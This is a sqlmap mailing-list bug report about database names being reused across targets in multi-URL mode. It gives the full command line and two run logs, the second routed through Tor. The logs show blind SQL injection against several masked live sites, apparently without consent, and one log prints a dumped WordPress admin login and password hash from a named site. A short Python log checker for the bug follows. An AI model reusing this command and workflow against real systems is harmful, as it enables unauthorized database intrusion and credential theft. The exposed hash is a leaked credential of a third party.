The command line I used was:

sqlmap.py -m test-urls.txt -Twp_users -Cid,user_login,user_pass --dump --stop 1 --answer="crack=N" -p id --technique=B --null-connection --batch > test-urls-output.txt

When processing a list of urls from a file, sqlmap retrieves the
database name from the first url and then uses this database name when
trying to retrieve column names for all other urls.

For example, in the attachment test-url-a48948_1.txt the first database
name retrieved was 'a48948_1'; sqlmap tried to retrieve column names
for the database a48948_1 in all following urls and failed.

In the attachment test-urls-drmoto_wp.txt the first database name to be
retrieved was 'drmoto_wp', then sqlmap tried to retrieve column names
for the database a48948_1 in all following urls.

The file test-urls.txt in these two runs contained the same 3 urls,
just in different order.

sqlmap/1.0-dev-50ac3aa - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability and
are not responsible for any misuse or damage caused by this program
[*] starting at 00:53:07
[00:53:07] [INFO] parsing multiple targets list from 'test-urls.txt'
[00:53:07] [INFO] sqlmap got a total of 3 targets
url 1:
GET
http://************************************************************************
do you want to test this url? [Y/n/q]
> Y
[00:53:07] [INFO] testing url
'*************************************************************'
[00:53:07] [INFO] flushing session file
[00:53:07] [INFO] using 'D:\Soft\sqlmap-dev\output\results-04072013_1253am.csv'
as the CSV results file in multiple targets mode
[00:53:07] [INFO] testing connection to the target url
[00:53:08] [INFO] testing if the url is stable. This can take a couple of
seconds
[00:53:12] [WARNING] reflective value(s) found and filtering out
[00:53:12] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[00:53:12] [INFO] testing for SQL injection on GET parameter 'id'
[00:53:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:53:18] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[00:53:29] [INFO] heuristic (extended) test shows that the back-end DBMS could
be 'MySQL'
do you want to include all tests for 'MySQL' extending provided level (1) and
risk (1)? [Y/n] Y
[00:53:29] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 18 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: *********************************************************8
---
do you want to exploit this SQL injection? [Y/n] Y
[00:53:36] [INFO] testing MySQL
[00:53:37] [INFO] confirming MySQL
[00:53:39] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[00:53:39] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[00:53:39] [INFO] fetching current database
[00:53:39] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[00:53:39] [INFO] retrieved: a48948_1
[00:55:03] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'a48948_1'
[00:55:03] [INFO] retrieved: 0
[00:55:13] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'a48948_1'
[00:55:13] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'a48948_1'
[00:55:13] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'a48948_1'
[00:55:13] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'a48948_1'
[00:55:13] [INFO] retrieved:
[00:55:18] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[00:55:18] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'a48948_1'
url 2:
GET http://**************************************************
do you want to test this url? [Y/n/q]
> Y
[00:55:38] [INFO] testing url
'http://*************************************************'
[00:55:38] [INFO] testing connection to the target url
[00:55:39] [INFO] testing if the url is stable. This can take a couple of
seconds
[00:55:41] [INFO] url is stable
[00:55:41] [WARNING] reflective value(s) found and filtering out
[00:55:41] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[00:55:41] [INFO] testing for SQL injection on GET parameter 'id'
[00:55:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:55:45] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[00:55:51] [INFO] heuristic (extended) test shows that the back-end DBMS could
be 'MySQL'
do you want to include all tests for 'MySQL' extending provided level (1) and
risk (1)? [Y/n] Y
[00:55:51] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 18 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: *****************************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[00:55:54] [INFO] testing MySQL
[00:55:55] [INFO] confirming MySQL
[00:55:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[00:55:56] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'a48948_1'
[00:55:56] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[00:55:56] [INFO] retrieved: 0
[00:56:01] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'a48948_1'
[00:56:01] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'a48948_1'
[00:56:01] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'a48948_1'
[00:56:01] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'a48948_1'
[00:56:01] [INFO] retrieved:
[00:56:03] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[00:56:03] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'a48948_1'
url 3:
GET http://********************************************************
do you want to test this url? [Y/n/q]
> Y
[00:56:03] [INFO] testing url
'http://**************************************************'
[00:56:03] [INFO] flushing session file
[00:56:03] [INFO] testing connection to the target url
[00:56:03] [INFO] testing if the url is stable. This can take a couple of
seconds
[00:56:05] [INFO] url is stable
[00:56:06] [WARNING] reflective value(s) found and filtering out
[00:56:06] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[00:56:06] [INFO] testing for SQL injection on GET parameter 'id'
[00:56:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:56:11] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[00:56:17] [INFO] heuristic (extended) test shows that the back-end DBMS could
be 'MySQL'
do you want to include all tests for 'MySQL' extending provided level (1) and
risk (1)? [Y/n] Y
[00:56:17] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 18 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: **********************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[00:56:20] [INFO] testing MySQL
[00:56:21] [INFO] confirming MySQL
[00:56:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL >= 5.0.0
[00:56:22] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'a48948_1'
[00:56:22] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[00:56:22] [INFO] retrieved: 0
[00:56:31] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'a48948_1'
[00:56:31] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'a48948_1'
[00:56:31] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'a48948_1'
[00:56:31] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'a48948_1'
[00:56:31] [INFO] retrieved:
[00:56:33] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[00:56:33] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'a48948_1'
[00:56:33] [INFO] you can find results of scanning in multiple targets mode
inside the CSV file 'D:\Soft\sqlmap-dev\output\results-04072013_1253am.csv'
[*] shutting down at 00:56:33
sqlmap/1.0-dev-50ac3aa - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability and
are not responsible for any misuse or damage caused by this program
[*] starting at 12:35:21
[12:35:21] [WARNING] increasing default value for option '--time-sec' to 10
because switch '--tor' was provided
[12:35:21] [INFO] setting Tor HTTP proxy settings
[12:35:22] [WARNING] use switch '--check-tor' at your own convenience when
accessing Tor anonymizing network because of known issues with default settings
of various 'bundles' (e.g. Vidalia)
[12:35:22] [INFO] parsing multiple targets list from 'test-urls.txt'
[12:35:22] [INFO] sqlmap got a total of 3 targets
url 1:
GET http://**********************************************************
do you want to test this url? [Y/n/q]
> Y
[12:35:22] [INFO] testing url
'http://************************************************'
[12:35:22] [INFO] using 'D:\Soft\sqlmap-dev\output\results-04072013_1235pm.csv'
as the CSV results file in multiple targets mode
[12:35:22] [INFO] testing connection to the target url
[12:35:24] [INFO] testing NULL connection to the target url
[12:35:28] [INFO] testing if the url is stable. This can take a couple of
seconds
[12:35:31] [INFO] url is stable
[12:35:33] [WARNING] reflective value(s) found and filtering out
[12:35:33] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[12:35:33] [INFO] testing for SQL injection on GET parameter 'id'
[12:35:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:35:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[12:36:16] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
*********************************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[12:36:32] [INFO] testing MySQL
[12:36:36] [INFO] confirming MySQL
[12:36:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[12:36:42] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[12:36:42] [INFO] fetching current database
[12:36:42] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[12:36:42] [INFO] retrieved: drmoto_wp
[12:41:22] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'drmoto_wp'
[12:41:22] [INFO] retrieved: 3
[12:41:46] [INFO] retrieved: ID
[12:42:41] [INFO] retrieved: user_login
[12:47:44] [INFO] retrieved: user_pass
[12:52:25] [INFO] fetching entries of column(s) 'ID, user_login, user_pass' for
table 'wp_users' in database 'drmoto_wp'
[12:52:25] [INFO] fetching number of column(s) 'ID, user_login, user_pass'
entries for table 'wp_users' in database 'drmoto_wp'
[12:52:25] [INFO] retrieved: 13
[12:53:19] [INFO] retrieved: 1
[12:54:30] [INFO] retrieved:
[12:55:16] [INFO] heuristics detected web page charset 'ascii'
admin
[12:57:06] [INFO] retrieved: $P$B9UA6Ixzu72k/sWNnw2i8SJSOAxghQ.
[13:08:20] [INFO] analyzing table dump for possible password hashes
[13:08:20] [INFO] recognized possible password hashes in column 'user_pass'
[13:08:20] [INFO] writing hashes to file
'd:\soft\sqlmap-dev\sqlmaphashes-ib3psp.txt' for eventual further processing
with other tools
[13:08:20] [INFO] do you want to crack them via a dictionary-based attack?
[y/N/q] N
Database: drmoto_wp
Table: wp_users
[1 entry]
+----+------------------------------------+------------+
| ID | user_pass | user_login |
+----+------------------------------------+------------+
| 1 | $P$B9UA6Ixzu72k/sWNnw2i8SJSOAxghQ. | admin |
+----+------------------------------------+------------+
[13:08:20] [INFO] table 'drmoto_wp.wp_users' dumped to CSV file
'D:\Soft\sqlmap-dev\output\drmoto.ru\dump\drmoto_wp\wp_users.csv'
[13:08:20] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 1 times
url 2:
GET http://***************************************************************
do you want to test this url? [Y/n/q]
> Y
[13:08:20] [INFO] testing url
'************************************************************'
[13:08:20] [INFO] testing connection to the target url
[13:08:24] [INFO] testing NULL connection to the target url
[13:08:27] [INFO] testing if the url is stable. This can take a couple of
seconds
[13:08:30] [INFO] url is stable
[13:08:34] [WARNING] reflective value(s) found and filtering out
[13:08:34] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[13:08:34] [INFO] testing for SQL injection on GET parameter 'id'
[13:08:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:08:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[13:09:06] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ******************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[13:09:15] [INFO] testing MySQL
[13:09:18] [INFO] confirming MySQL
[13:09:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL >= 5.0.0
[13:09:21] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'drmoto_wp'
[13:09:21] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[13:09:21] [INFO] retrieved: 0
[13:09:38] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'drmoto_wp'
[13:09:38] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'drmoto_wp'
[13:09:38] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'drmoto_wp'
[13:09:38] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'drmoto_wp'
[13:09:38] [INFO] retrieved:
[13:09:49] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[13:09:49] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'drmoto_wp'
url 3:
GET
http://*******************************************************************************
do you want to test this url? [Y/n/q]
> Y
[13:09:49] [INFO] testing url
'**********************************************************88'
[13:09:49] [INFO] testing connection to the target url
[13:09:52] [INFO] testing NULL connection to the target url
[13:09:57] [INFO] testing if the url is stable. This can take a couple of
seconds
[13:10:04] [WARNING] reflective value(s) found and filtering out
[13:10:04] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[13:10:04] [INFO] testing for SQL injection on GET parameter 'id'
[13:10:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:10:23] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[13:10:52] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
***********************************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[13:11:08] [INFO] testing MySQL
[13:11:10] [INFO] confirming MySQL
[13:11:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[13:11:16] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'drmoto_wp'
[13:11:16] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[13:11:16] [INFO] retrieved: 0
[13:11:41] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'drmoto_wp'
[13:11:41] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'drmoto_wp'
[13:11:41] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'drmoto_wp'
[13:11:41] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'drmoto_wp'
[13:11:41] [INFO] retrieved:
[13:11:56] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[13:11:56] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'drmoto_wp'
[13:11:56] [INFO] you can find results of scanning in multiple targets mode
inside the CSV file 'D:\Soft\sqlmap-dev\output\results-04072013_1235pm.csv'
[*] shutting down at 13:11:56
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
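
A log check for the symptom reported above, added here as an example (it is not part of the original message or of sqlmap's code): it splits a multi-target run into its 'url N:' sections and flags every target that enumerates a database it never fetched itself. The function names are hypothetical and the sample log is constructed, modelled on the wrapped lines shown in the attachments.

```python
import re

URL_HDR = re.compile(r"^url (\d+):[ \t]*$", re.M)
# The name printed on the first "retrieved:" line after the current-db fetch.
CUR_DB = re.compile(r"fetching current database.*?\[INFO\] retrieved:[ \t]*(\S*)", re.S)
# \s+ tolerates the line wrapping seen in the captured output.
USED_DB = re.compile(r"in\s+database\s+'([^']+)'")

# Constructed sample: target 1 fetches its database, targets 2 and 3 reuse it.
SAMPLE_LOG = """\
url 1:
[00:00:01] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[00:00:01] [INFO] fetching current database
[00:00:01] [WARNING] running in a single-thread mode.
[00:00:02] [INFO] retrieved: site1_db
[00:00:03] [INFO] fetching columns 'id, user_login' for table
'wp_users' in database 'site1_db'
url 2:
[00:00:10] [INFO] fetching columns 'id, user_login' for table
'wp_users' in database 'site1_db'
[00:00:11] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'site1_db'
url 3:
[00:00:20] [INFO] fetching columns 'id, user_login' for table
'wp_users' in database 'site1_db'
"""

def split_targets(log):
    """Yield (target_number, section_text) for each 'url N:' block."""
    hits = list(URL_HDR.finditer(log))
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(log)
        yield int(m.group(1)), log[m.end():end]

def find_inherited_db(log):
    """Return [(target_number, database)] for targets that enumerate a
    database name they did not fetch in their own section."""
    # If the database was given explicitly (-D), the "missing database
    # parameter" warning is absent and reuse across targets is expected.
    if "missing database parameter" not in log:
        return []
    findings = []
    for num, text in split_targets(log):
        fetched = CUR_DB.search(text)
        fetched_name = (fetched.group(1) or None) if fetched else None
        for db in sorted(set(USED_DB.findall(text))):
            if db != fetched_name:
                findings.append((num, db))
    return findings

if __name__ == "__main__":
    for num, db in find_inherited_db(SAMPLE_LOG):
        print(f"url {num}: uses database '{db}' without fetching it")
```
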